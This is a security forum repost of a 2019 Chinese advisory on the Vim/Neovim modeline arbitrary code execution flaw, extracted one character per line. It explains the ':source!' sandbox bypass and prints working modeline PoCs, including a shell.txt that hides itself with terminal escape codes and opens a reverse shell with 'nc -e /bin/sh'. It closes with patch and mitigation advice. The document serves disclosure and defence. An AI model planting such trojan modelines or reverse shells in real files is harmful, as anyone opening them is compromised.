论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
代码执行
[14199] 2019-06-06_文本编辑器VimNeovim被曝任意代码执行漏洞
文档创建者:
s7ckTeam
浏览次数:
7
最后更新:
2025-01-18
代码执行
7 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2019-06-06_文本编辑器VimNeovim被曝任意代码执行漏洞
文
本
编
辑
器
V
i
m
N
e
o
v
i
m
被
曝
任
意
代
码
执
行
漏
洞
F
r
e
e
B
u
f
2
0
1
9
-
0
6
-
0
6
以
下
文
章
来
源
于
黑
鸟
,
作
者
黑
鸟
6
月
4
日
,
名
为
A
r
m
i
n
i
u
s
的
安
全
研
究
员
在
t
w
i
t
t
e
r
曝
光
现
V
i
m
/
N
e
o
v
i
m
的
本
地
代
码
执
行
漏
洞
,
并
且
还
被
披
露
了
P
o
C
。
作
为
L
i
n
u
x
的
上
古
神
器
级
的
文
本
编
辑
器
使
用
量
还
是
比
较
大
的
,
建
议
用
户
立
刻
更
新
最
新
补
丁
。
漏
洞
细
节
漏
洞
细
节
命
令
行
功
能
允
许
在
文
件
的
开
头
或
结
尾
附
近
指
定
自
定
义
编
辑
器
选
项
。
默
认
情
况
下
启
用
此
功
能
并
应
用
于
所
有
文
件
类
型
,
包
括
p
l
a
i
n
.
t
x
t
。
一
个
典
型
的
模
式
:
出
于
安
全
原
因
,
在
m
o
d
e
l
i
n
e
s
中
只
允
许
选
项
的
子
集
,
如
果
选
项
值
包
含
表
达
式
,
则
它
在
沙
箱
中
执
行
:
出
于
安
全
原
因
,
不
支
持
除
“
s
e
t
”
之
外
的
其
他
命
令
。
有
人
可
能
会
使
用
m
o
d
e
l
i
n
e
s
创
建
特
洛
伊
木
马
文
本
文
件
。
并
非
所
有
选
择
可
以
设
定
。
对
于
某
些
选
项
,
设
置
了
一
个
标
志
,
以
便
在
使
用
时
使
用
沙
箱
是
有
效
的
。
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
v
i
m
/
v
i
m
/
b
l
o
b
/
5
c
0
1
7
b
2
d
e
2
8
d
1
9
d
f
a
4
a
f
5
8
b
8
9
7
3
e
3
2
f
3
1
b
b
1
4
7
7
e
/
r
u
n
t
i
m
e
/
d
o
c
/
o
p
t
i
o
n
s
.
t
x
t
#
L
5
8
2
沙
箱
旨
在
防
止
副
作
用
:
‘
f
o
l
d
e
x
p
r
’
,
’
f
o
r
m
a
t
e
x
p
r
’
,
’
i
n
c
l
u
d
e
e
x
p
r
’
,
’
i
n
d
e
n
t
e
x
p
r
’
,
’
s
t
a
t
u
s
l
i
n
e
’
和
’
f
o
l
d
t
e
x
t
’
选
项
可
以
在
沙
箱
中
评
估
。
这
意
味
着
你
是
保
护
免
受
这
些
具
有
令
人
讨
厌
的
副
作
用
的
表
达
。
这
给
了
一
些
从
模
式
行
设
置
这
些
选
项
时
的
安
全
性
。
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
v
i
m
/
v
i
m
/
b
l
o
b
/
5
c
0
1
7
b
2
d
e
2
8
d
1
9
d
f
a
4
a
f
5
8
b
8
9
7
3
e
3
2
f
3
1
b
b
1
4
7
7
e
/
r
u
n
t
i
m
e
/
d
o
c
/
e
v
a
l
.
t
x
t
#
L
1
3
0
5
0
但
是
,
:
s
o
u
r
c
e
!
命
令
(
使
用
b
a
n
g
[
!
]
修
饰
符
)
可
用
于
绕
过
沙
箱
。
它
从
给
定
文
件
中
读
取
并
执
行
命
令
,
就
像
手
动
键
入
,
在
沙
箱
离
开
后
运
行
它
们
一
样
。
从
{
f
i
l
e
}
读
取
V
i
m
命
令
。
这
些
是
命
令
从
您
正
常
模
式
执
行
,
就
像
您
输
入
他
们
一
样
。
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
v
i
m
/
v
i
m
/
b
l
o
b
/
5
c
0
1
7
b
2
d
e
2
8
d
1
9
d
f
a
4
a
f
5
8
b
8
9
7
3
e
3
2
f
3
1
b
b
1
4
7
7
e
/
r
u
n
t
i
m
e
/
d
o
c
/
r
e
p
e
a
t
.
t
x
t
#
L
1
8
2
因
此
,
可
以
简
单
地
构
建
一
个
在
沙
箱
外
部
运
行
代
码
的
模
式
行
:
N
e
o
v
i
m
还
需
要
一
个
额
外
的
步
骤
,
即
e
x
e
c
u
t
e
(
)
:
在
这
里
,
a
s
s
e
r
t
_
f
a
i
l
s
(
)
也
可
以
使
用
,
也
需
要
{
c
m
d
}
参
数
:
以
下
模
式
行
使
用
f
o
l
d
表
达
式
来
运
行
s
o
u
r
c
e
!
%
以
执
行
当
前
文
件
,
该
文
件
又
u
n
a
m
e
-
a
|
|
“
(
g
a
r
b
a
g
e
)
”
作
为
s
h
e
l
l
命
令
执
行
:
此
外
,
仅
N
e
o
v
i
m
功
能
n
v
i
m
_
i
n
p
u
t
(
)
易
受
相
同
方
法
的
影
响
,
例
如
:
过
去
,
其
他
与
模
式
相
关
的
漏
洞
已
在
V
i
m
中
修
补
(
请
参
阅
C
V
E
-
2
0
0
2
-
1
3
7
7
,
C
V
E
-
2
0
1
6
-
1
2
4
8
)
。
P
O
C
第
一
种
:
第
一
种
:
1
、
创
建
p
o
c
.
t
x
t
2
、
确
保
未
禁
用
m
o
d
e
l
i
n
e
选
项
(
:
s
e
t
m
o
d
e
l
i
n
e
)
3
、
在
v
i
m
中
打
开
该
t
x
t
v
i
m
p
o
c
.
t
x
t
然
后
系
统
会
执
行
u
n
a
m
e
-
a
第
二
种
:
第
二
种
:
该
P
o
C
描
述
了
一
种
真
实
的
攻
击
方
法
,
其
中
一
旦
用
户
打
开
文
件
就
启
动
反
弹
S
h
e
l
l
。
为
了
隐
藏
攻
击
,
文
件
将
在
打
开
时
立
即
重
写
。
此
外
,
当
使
用
c
a
t
打
印
内
容
时
,
P
o
C
使
用
终
端
转
义
序
列
来
隐
藏
命
令
行
。
而
使
用
c
a
t
-
v
可
以
显
示
实
际
内
容
。
s
h
e
l
l
.
t
x
t
:
视
频
演
示
视
频
演
示
黑
鸟
黑
鸟
.
一
介
草
民
,
深
耕
威
胁
情
报
领
域
多
年
,
自
封
威
胁
分
析
师
,
A
P
T
狩
猎
者
,
战
略
忽
悠
分
析
师
。
专
注
推
送
一
切
前
沿
高
科
技
战
争
分
析
,
敌
我
战
略
分
析
,
“
数
据
”
挖
掘
,
情
报
拓
展
,
网
络
武
器
分
析
,
社
会
工
程
学
,
军
事
分
析
忽
悠
等
。
/
*
v
i
m
:
s
e
t
t
e
x
t
w
i
d
t
h
=
8
0
t
a
b
s
t
o
p
=
8
:
*
/
:
s
o
[
u
r
c
e
]
!
{
f
i
l
e
}
#
v
i
m
:
s
e
t
f
o
l
d
e
x
p
r
=
e
x
e
c
u
t
e
(
'
:
s
o
u
r
c
e
!
s
o
m
e
_
f
i
l
e
'
)
:
:
!
u
n
a
m
e
-
a
|
|
"
v
i
:
f
e
n
:
f
d
m
=
e
x
p
r
:
f
d
e
=
a
s
s
e
r
t
_
f
a
i
l
s
(
"
s
o
u
r
c
e
!
%
"
)
:
f
d
l
=
0
:
f
d
t
=
"
v
i
:
f
e
n
:
f
d
m
=
e
x
p
r
:
f
d
e
=
n
v
i
m
_
i
n
p
u
t
(
"
:
t
e
r
m
i
n
a
l
u
n
a
m
e
-
a
"
)
:
f
d
l
=
0
:
!
u
n
a
m
e
-
a
|
|
"
v
i
:
f
e
n
:
f
d
m
=
e
x
p
r
:
f
d
e
=
a
s
s
e
r
t
_
f
a
i
l
s
(
"
s
o
u
r
c
e
!
%
"
)
:
f
d
l
=
0
:
f
d
t
=
"
x
1
b
[
?
7
l
x
1
b
S
N
o
t
h
i
n
g
h
e
r
e
.
x
1
b
:
s
i
l
e
n
t
!
w
|
c
a
l
l
s
y
s
t
e
m
(
'
n
o
h
u
p
n
c
1
2
7
.
0
.
0
.
1
9
9
9
9
-
e
/
b
i
n
/
s
h
&
'
)
|
r
e
d
r
a
w
!
|
f
i
l
e
|
s
i
l
e
n
t
!
#
"
v
i
m
:
s
e
t
f
e
n
f
d
m
=
e
x
p
r
f
d
e
=
a
s
s
e
r
t
_
f
a
i
l
s
(
'
s
e
t
f
d
e
=
x
|
s
o
u
r
c
e
!
%
'
)
f
d
l
=
0
:
x
1
6
x
1
b
[
1
G
x
1
6
x
1
b
[
K
N
o
t
h
i
n
g
h
e
r
e
.
"
x
1
6
x
1
b
[
D
n
攻
击
者
是
右
边
,
被
攻
击
者
是
左
边
的
机
器
。
安
全
建
议
安
全
建
议
V
i
m
补
丁
8
.
1
.
1
3
6
5
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
v
i
m
/
v
i
m
/
c
o
m
m
i
t
/
5
3
5
7
5
5
2
N
e
o
v
i
m
补
丁
(
在
v
0
.
3
.
6
中
发
布
)
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
n
e
o
v
i
m
/
n
e
o
v
i
m
/
p
u
l
l
/
1
0
0
8
2
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
n
e
o
v
i
m
/
n
e
o
v
i
m
/
r
e
l
e
a
s
e
s
/
t
a
g
/
v
0
.
3
.
6
除
了
打
补
丁
之
外
之
外
,
建
议
在
v
i
m
r
c
(
s
e
t
n
o
m
o
d
e
l
i
n
e
)
中
禁
用
m
o
d
e
l
,
使
用
s
e
c
u
r
e
m
o
d
e
l
i
n
e
s
插
件
,
或
者
禁
用
m
o
d
e
l
i
n
e
e
x
p
r
(
因
为
补
丁
8
.
1
.
1
3
6
6
,
仅
限
V
i
m
)
以
禁
用
m
o
d
e
l
中
的
表
达
式
。
*
本
文
作
者
:
木
子
,
参
考
来
源
g
i
t
h
u
b
,
黑
鸟
,
转
载
请
注
明
来
自
F
r
e
e
B
u
f
.
C
O
M
精
彩
推
荐
精
彩
推
荐
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
代码执行